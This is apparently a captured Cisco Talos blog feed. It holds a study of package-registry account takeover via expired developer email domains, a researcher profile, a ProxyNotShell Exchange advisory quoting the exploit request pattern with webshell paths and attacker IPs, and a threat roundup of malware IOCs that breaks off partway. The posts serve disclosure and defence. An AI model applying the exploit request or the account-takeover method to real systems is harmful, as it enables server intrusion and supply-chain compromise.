🔒
There are new articles available, click to refresh the page.
Yesterday — 4 October 2022Cisco Talos

Developer account body snatchers pose risks to the software supply chain

4 October 2022 at 12:51


By Jaeson Schultz.
  • Over the past several years, high-profile software supply chain attacks have increased in frequency. These attacks can be difficult to detect and source code repositories became a key focus of this research.
  • Developer account takeovers present a substantial risk to the software supply chain because attackers who successfully compromise a developer account could conceal malicious code in software packages used by others.
  • Talos analyzed several of the major software repositories to assess the level of developer account security, focusing specifically on whether developer accounts could be recovered by re-registering expired domain names and triggering password resets.
  • Many software repositories have already begun taking steps to enhance the security of developer accounts. Talos has identified additional areas where the security of developer accounts could be improved. Talos worked with vulnerable repositories to resolve issues that we found.

Software supply chain attacks, once the exclusive province of sophisticated state-sponsored attackers, have been gaining popularity recently among a broader range of cyber criminals. Attackers everywhere have realized that software supply chain attacks can be very effective, and can result in a large number of compromised victims. Software supply chain attacks more than tripled in 2021 when compared with 2020. Why are software supply chain attacks so effective? Organizations that possess solid cyber defenses may be difficult to attack directly. However, these same organizations are likely vulnerable to a software supply chain attack because they still regularly run/build software obtained from vendors who are trusted.

Rather than attacking an entire software repository itself, or identifying an unpatched vulnerability in a software package, compromising the software supply chain can be as simple as attacking the accounts of the package developers and maintainers. Most software repositories track the identities of their software developers using those developers' email addresses. If a cybercriminal somehow gains access to a developer's email account, the attacker can theoretically generate password reset emails at these software repositories and take over the account belonging to that developer. Once inside, an attacker could then publish malicious updates to the code maintained by that developer, affecting every other piece of software that uses that library from then on.

Cisco Talos examined several frequently used code repositories. We looked specifically at the security afforded to developer accounts, and how difficult it would be for an attacker to take over a developer account. While some repositories had stringent security in place, others did not. Fortunately, worked with the managers of these repositories to resolve the major issues we found.

Risks in the software supply chain

Re-inventing the wheel is typically not a good idea. This holds true for many things, including developing software. Much software written today depends on third-party packages and software libraries to facilitate necessary functionality contained in the program. Utilizing third-party libraries and packages, especially open source, also speeds up development and lowers costs.

Popular software packages have also become attractive targets for attackers. The more popular a software library is, the more external software will be using that library, and thus, the larger the potential attack surface. Compromising a software library can potentially compromise every other piece of software that relies on that software library for its functionality. This is the risk inherent in the software supply chain.

With the exception of language-agnostic repositories like GitHub, most software repositories tend to be language specific. For example, JavaScript authors rely mostly on NPM, Python developers have PyPI, Perl programmers can often be found using packages obtained via CPAN, and so on. Each software repository sets its own rules when it comes to developers' accounts.

Additionally, as many programmers are aware, some programming languages make a better choice for solving certain types of problems. For example, embedded systems drivers are more commonly written in C instead of Perl, while parsing text is more commonly done in Perl or Python, rather than C. This means that the process of writing programs that integrate third-party libraries into the code will also be different for each language. It is difficult to imagine a developer integrating a third-party library into a system-level driver written in C without carefully reviewing the related code and testing it for speed and functionality. However, when developing a feature-rich Perl proof-of-concept application or a web-based JavaScript application, this might not always be the case. A programmer in those instances might conceivably import a package first and ask questions later. This means some software repositories will carry more risk than others when it comes to malware hiding in the source code.

NPM

Node Package Manager is a JavaScript software repository and has been the subject of some "independent" security audits recently. There has been a lot of discussion online, especially concerning the security of the developer accounts there, and how easy it is to take over these accounts by re-registering expired email domains.


There are more than 2 million packages in the NPM repository. Conveniently, an NPM package called "all-the-package-names" contains a list of all packages in the NPM repository. Each individual package at NPM has associated metadata, such as a text description of the package, a link to the package tarball, and a list of the package maintainers. Most importantly, the list of package maintainers has the developer's username and email address.



Iterating through all the package names, and extracting the email addresses, then further extracting the domain names from those email addresses, provides the raw data necessary to find developer accounts associated with expired domains. Once an expired domain is found, it can be re-registered and theoretically used to take over the NPM developer account. But does it work this way in practice?

Although we found a couple thousand expired developer account domain names, we could not recover the associated developer accounts. It appears the "couple things in place to protect against [account takeover]" that NPM administrator @MylesBorins mentioned in his tweet above are working as planned.

Stale metadata helps foil attackers

NPM provides developers with the ability to update the email address associated with their accounts. When a developer decides to switch email addresses, only the future package/version's metadata will contain the new email address. NPM does not retroactively update old metadata associated with a package that was previously published. This means that, even though someone looking to take over an NPM developer account might find package metadata indicating a developer with an expired email domain, it could simply be that the developer has updated their NPM account to a new email address.

This was the case in May 2022, when a security researcher claimed to have taken over the NPM package "foreach" by re-registering the email domain belonging to the NPM developer. Unbeknownst to the security researcher, the developer in question had actually updated their NPM account to use their Gmail address instead. So if any password recovery attempts were made, they would have failed — NPM would have generated and sent the password reset emails to the new Gmail account on file, which is still under the original developer's control.



PyPI

PyPI is the Python Package Index and currently contains almost 400,000 projects. Developers at PyPI have email addresses associated with their accounts, however, PyPI does not display the email address publicly by default. This is an option that the developer must explicitly choose to enable. Many developers are, of course, eager to interact with others who are running their code, so it is no surprise that large numbers of developers enable this feature.

PyPI accounts do not come with MFA enabled by default, so this is something else a developer would have to choose to enable. However, in July 2020 PyPi announced that it was rolling out mandatory MFA to "critical projects," a.k.a. the top 1% of the projects at PyPi (based on the number of downloads).



A list of all PyPI packages is available online. Many of these packages contain a mailto: link containing an email address. There is also a list of maintainers of the package. For developers that expose their email addresses publicly, it's found on the user's public profile page. It is a relatively simple process to scrape the email addresses associated with PyPI projects. PyPI reveals whether an email address is associated with an account (but it probably should not).



Account takeovers have been a problem at PyPI in the past. As recently as May 14, 2022, an attacker managed to take over a developer account and replaced the "ctx" package, adding malicious code that stole the user's environment variables, base64-encoded them and transmitted the data back to the attacker's C2 server. Fortunately, the changes made by the admins over at PyPI seem to be moving account security in the right direction.

CPAN

The Comprehensive Perl Archive Network (CPAN) contains more than 200,000 Perl modules. CPAN also provides an index of all the module authors.



The individual module authors each have their own "homepage" that lists their contributed modules. For anyone who wants to reach out to the dev, CPAN includes the author's email address.



A motivated attacker can easily scrape the CPAN website for a list of all author IDs and use those to scrape the email address belonging to the developers. A whois search on the email domain of the developer email addresses provides us with a list of developer accounts that are vulnerable to account takeover. From there, all that is required is standing the domain up somewhere and running a mail server. Triggering a password reset provides us with the magic link to get into the developer's account.





Talos has reached out to the admins at CPAN and provided them with a list of the vulnerable developer accounts we found. CPAN has disabled these accounts.

NuGet

NuGet is a software repository for .NET developers. The NuGet "gallery" contains more than 317,000 packages. Fortunately, registered developers at NuGet have their email addresses hidden by default. There is an option to allow users to contact you, using a form on the NuGet website that does not disclose the email address of the developer. Developers have the option of adding their Twitter handle, and many developers do. If an attacker wishes to attack NuGet developers en masse, they would have a very difficult time assembling a list of developer email addresses.



RubyGems

RubyGems is a software repository for Ruby developers. There are currently approximately 172,000 gems (packages) in the repository. Developer email addresses are hidden from the public by default. Even unchecking the "Hide email in public profile" check box has no discernable effect, and the email address remains hidden.



Some gems have "maintainers" files to indicate the contact email addresses of the developers, but this is not consistent across gems. Recently, the RubyGems team announced that they are enforcing MFA for top developer accounts.



Conclusion

The software supply chain attack problem is not likely to go away anytime soon. It is unreasonable to ask organizations to vet every piece of software that runs in their environment. Some amount of trust in software vendors and suppliers will always be necessary. However, that doesn't mean that defenders are helpless against these types of attacks.

Organizations should analyze what software is required on various internal systems. Many times, there may be opportunities to segment a group of systems running a particular piece of software from the rest of the internal network. This way, any compromise that occurs as a result of a software supply chain attack will be limited in scope. Obviously, there are limitations to this approach.

All parties in the software supply chain need to take more responsibility for security. For example, it would be far safer for software repositories to stop publishing or releasing any information related to a developer's email address. Yes, this is arguably a bit of security-by-obscurity, but it forces attackers to go elsewhere to correlate the email account of a developer with the particular software package in question, and greatly enhances the security of the repository. If a repository wishes to publish a developer's email address, it could instead give each developer an email address at the domain of the repository itself (ex., @npmjs.com, @cpan.org, etc.).

Forcing MFA on the most popular package maintainers also seems to be a sensible remedy that is currently being pursued by several repositories. However, security is always a delicate balance. If you sacrifice too much usability in the pursuit of security, developers may rebel, as was the case with PyPI developer "untitaker."

One sure-fire countermeasure against developer account takeover via expired domain registration is code signing. This is really the best way to be sure that the code you use has not been tampered with since it was last signed, and is indeed from a developer you trust. An attacker who gets control of a developer's expired domain name would have no way to recover the code signing keys belonging to that developer and no way to impersonate that developer.

Before yesterdayCisco Talos

Researcher Spotlight: Globetrotting with Yuri Kramarz

3 October 2022 at 14:00

From the World Cup in Qatar to robotics manufacturing in east Asia, this incident responder combines experience from multiple arenas 

By Jon Munshaw. 

Yuri “Jerzy” Kramarz helped secure everything from the businesses supporting the upcoming World Cup in Qatar to the Black Hat security conference and critical national infrastructure. 

He’s no stranger to cybersecurity on the big stage, but he still enjoys working with companies and organizations of all sizes in all parts of the world. 

“What really excites me is making companies more secure,” he said in a recent interview. “That comes down to a couple things, but it’s really about putting a few solutions together at first and then hearing the customer’s feedback and building from there.” 

Yuri is a senior incident response consultant with Cisco Talos Incident Response (CTIR) currently based in Qatar. He walks customers through various exercises, incident response plan creation, recovery in the event of a cyber attack and much more under the suite of offerings CTIR has. Since moving from the UK to Qatar, he is mainly focused on preparing various local entities in Qatar for the World Cup slated to begin in November. Qatar estimates more than 1.7 million people will visit the country for the international soccer tournament, averaging 500,000 per day at various stadiums and event venues. For reference, the World Bank estimates that 2.9 million people currently live in Qatar.

This means the businesses and networks in the country will face more traffic than ever and will no doubt draw the attention of bad actors looking to make a statement or make money off ransomware attacks. 

“You have completely different angles in preparing different customers for defense during major global events depending on their role, technology and function,” Kramarz said.  

In every major event, there were different devices, systems and networks interconnected to provide visitors and fans with various hospitality facilities that could be targeted in a cyber attack. Any country participating in the event needs to make sure they understand the risks associated with it and consider various adversary activities that might play out to secure these facilities. 

Kramarz has worked in several different geographic areas in his roughly 12-year security career, including Asia, the Middle East, Europe and the U.S. He has experience leading red team engagements (simulating attacks against targets to find potential security weaknesses) in traditional IT and ICS/OT environments, vulnerability research and blue team defense. The incident response field has been the perfect place for him to put all these skills to use. 

He joined Portcullis Security in 2011 as a security consultant and eventually moved throughout Cisco after it acquired Portcullis in 2015. As a red teamer, he had to develop exploits and think about the potential paper trail those exploits would leave behind — after all, it was his job to show where current security structures had failed. 

“Every time I would try to design a payload, I’d have to forensically understand what fingerprints are left on the system,” he said. “So effectively I had to do incident response for a decade before I joined CTIR.” 

That breadth of experience also helps because CTIR is platform-agnostic. He often must access and leverage other companies’ technology and software, such as during the Black Hat conference earlier this year when he was part of a Cisco team that set up and defended the on-site network in Las Vegas

“We had to check all the different technology stacks to make sure we could stop adversaries before they became a problem,” he said. “From there, we moved to use those technologies to detect what’s happening in real-time … and then we used [Cisco] SecureX to unify some of the response capability. By default, you pretty much must learn about every piece of technology that’s out there to provide an effective incident response as we can’t wait days or weeks to deploy something during an emergency.” 

Yuri is used to working in different time zones at different hours of the day, too. His favorite incident response to an engagement call came around midnight one night when he was on call — a large conglomerate was under attack and the adversaries deployed ransomware. He was part of the CTIR team who immediately responded to identify and eradicate the ransomware attack. CTIR eventually successfully brought systems back online.  

“And from there, we built a great relationship with the customer that’s been ongoing since then,” he said. 

Yuri enjoys golfing in his free time.
Although incident response can lead to these kinds of late nights, Yuri said he’s thankful that Cisco Talos offers him the flexibility to work different hours and take time off when he needs it. Golf is his current outlet for relaxation, and it gives him something mutual to talk to people about regardless of what country they’re in. While not out on the green he likes to contribute to several open-source projects

Since coming into the incident response field, he’s had to flex his interpersonal skills more than ever because CTIR places such an emphasis on making IR a team sport. 

“The way I try to carry myself is to be happy and to look at my reflection every morning and say, ‘I’m doing the best I can for my customer,’” Kramarz said. “If I put my signature on a report, I want to make sure I’m proud of it.” 

Once the World Cup wraps up, Yuri said he will carry on focusing on securing critical infrastructure and operational technology. It’s a unique challenge, he said, because a lot of the technology can be more than 20 or 30 years old, and each customer is going to need a unique solution to their problems.  

“One time during an incident in a different country, we had to look at physical manuals in binders from a decade before to figure out how the affected device actually worked and how someone could hack it, as only several of the devices had ever even been produced,” he said. “We know how to acquire evidence on the standard operating systems out there such as Unix or Windows, and we have the tools of the trade to help us with that. We often don’t get that in ICS/OT environment, so innovation is a key in this field.” 

If your organization would like to work with Yuri or one of his fellow CTIR team members, you can reach out to them here. Talos Incident Response offers a range of proactive services for security teams, including hands-on tabletop exercises, a state-of-the-art cyber range for training and much more.   

Threat Advisory: Microsoft warns of actively exploited vulnerabilities in Exchange Server

30 September 2022 at 21:16


Cisco Talos has released new coverage to detect and prevent the exploitation of two recently disclosed vulnerabilities collectively referred to as "ProxyNotShell," affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. CVE-2022-41040 is a Server Side Request Forgery (SSRF) vulnerability, while CVE-2022-41082 enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers.

While no fixes or patches are available yet, Microsoft has provided mitigations for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. Cisco Talos is closely monitoring the recent reports of exploitation attempts against these vulnerabilities and strongly recommends users implement mitigation steps while waiting for security patches for these vulnerabilities. Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The Hafnium threat actor exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was one of the four attacks they saw most often last year.


Vulnerability details and ongoing exploitation


Exploit requests for these vulnerabilities look similar to previously discovered ProxyShell exploitation attempts:

autodiscover/[email protected]/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%[email protected]

Successful exploitation of the vulnerabilities observed in the wild leads to preliminary information-gathering operations and the persistence of WebShells for continued access to compromised servers. Open-source reporting indicates that webShells such as Antsword, a popular Chinese language-based open-source webshell, SharPyShell an ASP.NET-based webshell and China Chopper have been deployed on compromised systems consisting of the following artifacts:

  • C:\inetpub\wwwroot\aspnet_client\Xml.ashx
  • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx
  • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx
  • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx


This activity is consistent with what is typically observed when attackers begin leveraging vulnerabilities in unpatched or vulnerable systems exposed to the internet.

Initial reporting observed the download and deployment of additional malicious artifacts and implants on the infected systems using certutil, however these TTPs may change as more threat actors start exploiting the vulnerabilities followed by their own set of post-exploitation activities.

Coverage


Ways our customers can detect and block this threat are listed below.



Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Cisco Talos is releasing SID 60642 to protect against CVE-2022-41040.

In addition we are releasing SIDs 60637-60641 to protect against malicious activity observed during exploitation of CVE-2022-41082.

The existing SIDs 27966-27968, 28323, 37245, and 42834-42838 provide additional protection for the malicious activity observed during exploitation of CVE-2022-41082.

The following ClamAV signatures have been released to detect malware artifacts related to this threat:

  • Asp.Backdoor.AntSword-9972727-1
  • Asp.Backdoor.Awen-9972728-0
  • Asp.Backdoor.AntSword-9972729-0


IOCs

IPs and URLs

125[.]212[.]220[.]48
5[.]180[.]61[.]17
47[.]242[.]39[.]92
61[.]244[.]94[.]85
86[.]48[.]6[.]69
86[.]48[.]12[.]64
94[.]140[.]8[.]48
94[.]140[.]8[.]113
103[.]9[.]76[.]208
103[.]9[.]76[.]211
104[.]244[.]79[.]6
112[.]118[.]48[.]186
122[.]155[.]174[.]188
125[.]212[.]241[.]134
185[.]220[.]101[.]182
194[.]150[.]167[.]88
212[.]119[.]34[.]11
137[.]184[.]67[.]33
206[.]188[.]196[.]77
hxxp://206[.]188[.]196[.]77:8080/themes.aspx




Threat Roundup for September 23 to September 30

30 September 2022 at 20:46

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 23 and Sept. 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Virus.Parite-9970689-0 Virus Parite is a polymorphic file infector. It infects executable files on the local machine and on network drives.
Win.Malware.Zusy-9970856-0 Malware Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Dropper.Remcos-9970861-0 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Malware.Emotet-9970880-0 Malware Emotet is currently one of the most widely distributed and active malware families. It is a highly modular threat that can deliver a wide variety of payloads. The botnet is commonly delivered via Microsoft Office documents with macros sent as attachments to malicious emails.
Win.Dropper.TrickBot-9970890-0 Dropper TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution such as VB scripts.
Win.Dropper.XtremeRAT-9971238-0 Dropper XtremeRAT is a remote access trojan active since 2010 that allows the attacker to eavesdrop on users and modify the running system. The source code for XtremeRAT, written in Delphi, was leaked online and has since been used by similar RATs.
Win.Dropper.Kuluoz-9971090-0 Dropper Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that downloads and executes follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
Win.Dropper.Shiz-9971537-0 Dropper Shiz is a remote access trojan that allows an attacker to access an infected machine in order to harvest sensitive information. It is commonly spread via droppers or by visiting a malicious site.
Win.Packed.Fareit-9971247-1 Packed The Fareit trojan is primarily an information stealer with functionality to download and install other malware.

Threat Breakdown

Win.Virus.Parite-9970689-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 29 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: HideFileExt
29
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
29
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CABINETSTATE
Value Name: fullpath
29
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
1
Files and or directories created Occurrences
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 29

File Hashes

0536b9760519d832e0c5ff072cad054ef2ae43dbe57330d48c609aeb75e6ae43 0fb870a5615c6c24fa559ae795c3366d80a97622fe2efac880330772344a9760 10308179aec9cf03dfe7fcd95aba9f1da191f70406d653157ea3746e63423c93 15e5fc751dbee4b99c094bbfd15d5b4c3655e0a8a34af84cb4773f2bcd265db8 16048c5e4b000118579343bcf188dbb5bcc0d313bd144a08a76423a7ff990c58 1a16bf0852508c3742325cd1b25c6fa9f9580e42017f273ff81d41edea8bd579 23c44b2d663dcb0224e7a2dcbd9a179923baf1c1d95f221f0435eef3fa6c7913 264dfb45197cb3e37d2054313e54c5549dd53f9d6cbc4a7cf9963b8275e59811 3605daf57520cfe6759abc471cb9a55ff4a6b99711ee3718ce6db3438b63a7e0 39139ac00356189a53c9122b4efa10a9e5ca42b25656cc794d4199d5a0e6003a 3a19cc265b1767563c293cfe5dfd8083a1cb72e37625bd243538f210594bd9bf 51f14dad750e0a93bdf69200d726c8f929a6e903dc837fefc5b2efdf7b33493e 530e290a3e9383bc016d666d4829f2ca2c256f5f32e8c84e71346f1d4a65302a 58950830c787ae1768a8d5aab290270b089b04e61d39e6b82a7daf51696fea03 5b0d897a5c748d58c536b19b0d16b3262cc238d65ac41d22f4552d1a2a0ea966 66fe640d820e530e4554251bcb07177a4f2fdea28fc13beb588898a0374fd20d 714ced6bb466961048291a1f89355892490a10bd6e206a256b2e3b97bf1fec55 7dbd9b1e5792f9085af025e526f331e00c878b2adc2e0d8c4a2c5dba4d79a32b 8c8c7b2a40fcdff745e87d060daac5798bda65e8e1568dd46e69d703a5adace3 933768be5d22750f182e69c91630a6f7af6f5db309ba61f83d5547c9a8865273 95463bf7d0d934880a1292e479f56d69596e43062eb18265ef43905702551af0 a1af5ed894006b1690455b12e58c117725a5274e7fc6f8410af119429171372d a9a2deaa34de9ebc68523c18ad02f8a27aae60818fda1583440df25f336f61c2 aedea0e8e6ee4e36191b3e67dcc71e169ea9c1419b5ad4a062f3f2d37a99f3a3 c000e844ca7377e4f3a8e4bfdf0962897effa1622660e8b48d190e2820ff4429
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Malware.Zusy-9970856-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 13 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
8
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
8
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\APPLICATIONDESTINATIONS
Value Name: MaxEntries
1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
47[.]111[.]103[.]192 13
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
os[.]ieycc[.]com 13
Files and or directories created Occurrences
\Client.txt 13
%TEMP%\Tomato.ini 13
%APPDATA%\testing.dat 13
\TEMP\1E0F0E0A120B156B155B15E0C0F160E0D160A.exe 1
\TEMP\1F0F0D0C120A156D155E15E0A0E160B0C160F.exe 1
\TEMP\1F0B0B0A120E156C155E15D0A0F160D0E160D.exe 1
\TEMP\1C0B0F0A120C156F155C15E0B0A160F0E160D.exe 1
\TEMP\1B0C0D0C120A156E155C15C0E0D160D0B160E.exe 1
\TEMP\1B0F0A0D120F156E155C15F0C0E160E0F160A.exe 1
\TEMP\1E0F0B0A120F156F155E15D0B0E160B0D160E.exe 1
\TEMP\1D0D0C0E120C156D155F15A0A0E160C0C160A.exe 1
\TEMP\1E0D0C0D120F156E155C15F0A0E160D0C160F.exe 1
\TEMP\1C0B0C0B120D156E155E15A0E0F160B0D160D.exe 1
\TEMP\1E0C0F0F120A156A155B15A0F0A160E0D160A.exe 1
\TEMP\1E0C0A0A120B156F155D15A0E0F160B0A160A.exe 1
\TEMP\1E0B0C0D120C156C155A15D0D0D160B0D160C.exe 1

File Hashes

015c6d06fe9aaa4844b5e008796cbb854cf6765c2ca398f596dd2fceeceb6c95 0de5af728d4834e450386979efd9681bd54bfeb65f687cccd621f3a20331c050 43d5fb959a8c848030537e37f0d0638bc57bb83652dba85ee2e868a17f1d10ef 568bc0b8c2e914ca7cb2f62bfd82839c584d14d3d47b96ea34703b9d024c78ec 7539e13bb8b001f08742f38c29b42135a2b414e2ba095cf3bf74f38db78f3e0f 80459aa210f4e16b123a27b47c1191872b79a6c6a8751613ad1b649a0f1f3426 974e745bbf32ea7bf0bcff7bd04e3b13f8f3c9cf8a79d01f34658729c793e333 aa22f56078cf431f2587ea270f428fff6d4eee5b08d542b40b89a9712e14e5b3 acf7e8303fd53c63b778a611773267ecf001225772bee1fccbd2a2370ad6e658 ae24b008cb2dc1855367cd814581f1092d9899a77e982f8fc746409c29afbaaa b13513bd0c731f688fe25804c6dd74a3126d0494549368c8d692bd85d2024e5f e35cb24702c24b57edf8f1439a1409b6c8c0f97bc30a90a3c396fdd0f3c38f84 f9501ffa9e293c88c61e0071fdc5b7ce2d00e1c8bc20a564ab906dfb9565e4c7

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Remcos-9970861-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 42 samples
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
172[.]98[.]192[.]37 42
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
www[.]djapp[.]info 42
Files and or directories created Occurrences
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 42
%APPDATA%\Microsoft\Windows\Cookies\NFIM9G9G.txt 10
%TEMP%\FltFD54.exe 1
%TEMP%\FltFAC5.exe 1
%TEMP%\FltFF0C.exe 1
%TEMP%\FltA28D.exe 1
%TEMP%\FltE1AD.exe 1
%TEMP%\FltFAB6.exe 1
%TEMP%\Flt593A.exe 1
%TEMP%\FltF8C2.exe 1
%TEMP%\Flt4F6E.exe 1
%TEMP%\FltFB71.exe 1
%TEMP%\FltA461.exe 1
%TEMP%\FltFD74.exe 1
%TEMP%\Flt23BD.exe 1
%TEMP%\Flt8A88.exe 1
%TEMP%\FltBC04.exe 1
%TEMP%\FltF633.exe 1
%TEMP%\FltB040.exe 1
%TEMP%\Flt6184.exe 1
%TEMP%\Flt540D.exe 1
%TEMP%\Flt5D82.exe 1
%TEMP%\FltBD3A.exe 1
%TEMP%\tnf5FD1.exe 1
%TEMP%\FltC777.exe 1
*See JSON for more IOCs

File Hashes

00cda027a316d979f614cd747e8eea14fcc1f7a144b5eb5fc385ea3b52ada9ac 04a7c806cd6404d5547bf136331733e970364c0090c705b0002170ca7fa59882 06a0c6a86e47342846759164e0a7da0087e5926d1bdf48b64ad106b6e53951a4 0d103909b0c3e6ac0021b1aa8bbd17b50d1f94ccfb6011a1b70609b6a45668fe 0d503f2d89c74456f441b95033f1f7f1b5f8c9b9ef338c177beb7e22c3844cb8 13d63a2102b3685464c7f32f95fb4ed6287f51db1da590f7141ad36d2ec0fe00 16de9b5489c9bc4900f94a6939e4a5124caee0ce2ac4dcd938850385c35ecd94 16e1726e22af546ae83bf70500135f69e1f3805c2c49752b6098c07f0815307a 1bb3b038b6da9ca30bf12a24ab4e0361ff60c6375bed74492ac37652e2ecd3da 23f59e71fd7d520a50ae1aaea2c026ae2f05a85d6bf1f24301ceac52e713157b 24d621a695ef4fae5b296bc2bb6071cc90b9c56415f70464797e69080b6a7e75 2635c53ba6293fe95e539dfd0f480835ceb7b47c6971a3024ae8443893eca176 2c65cccfb66e0773395cd78f4c742f03cdf3d482357278cf53cd47ea87f62f04 2d82667b13cc3acb398ae87a83674ce3a334867e82d20b4fd809a14d10323084 2e53c50fd916da51599be464f226b09f28d70fe323cb292c115b9723d402ddde 3457b58ade09a9a581003687d9bd904c6200dcc96aafbb24450c371a165c96d8 3832ee4b74d72c5b4e8299cc9e20248145ff74a7364ebfeb2baa9ee60c0a00d8 38ff5081e308b00e57028e3ad749ae4dccf165796a073fafacd6e6cbad31cc21 3e278b7296bcb58b47e8d60ee9a7f44c548a6d790cdf45fcdff6bc526c395a93 3f4fa0de7c9e2b18b0e16b1cbd72dcc279d5ab6b727992a158ed4bced8663f87 40318b04af3f4761f989d5725e61fc41bd034990e3a86478c897466416632c44 4126cae93a6d1471fbf37ef4a73347ed4fa136486fe7229b06721db5d50ed27c 479e0fa51921d000d9ae53beb96c8d88b3e90ba563b7595db6d015fe0c41beea 50532f85c712a7ba7e79ba23130a568fdfcfde7c3bdbcec90edea02aacef7f9b 535e141dc2b44bdafa9fd3ef6c3355413bd7837c5bfc398c608ea49e150b7727
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Malware.Emotet-9970880-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95} 25
